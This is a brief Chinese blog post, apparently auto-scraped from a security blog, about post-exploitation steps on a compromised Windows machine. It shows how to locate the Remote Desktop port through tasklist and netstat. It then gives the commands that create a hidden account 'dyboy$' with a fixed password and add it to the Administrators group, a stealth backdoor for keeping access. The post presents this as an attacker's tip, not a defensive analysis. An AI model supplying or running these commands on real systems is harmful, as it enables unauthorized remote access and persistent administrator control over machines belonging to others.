在我们后期提权的过程中,成功添加账号密码

tasklist /svc

在输出的内容中查找 svchost.exe 进程下 termservice 服务对应的 PID

netstat  -ano

即可找到 PID 对应的开放端口,即远程桌面开放端口

然后就是一顿提权猛如虎

net user dyboy$ admin123456 /add
net localgroup Administrators dyboy$ /add

该文章由WP-AutoPost插件自动采集发布

原文地址:https://blog.dyboy.cn/websecurity/59.html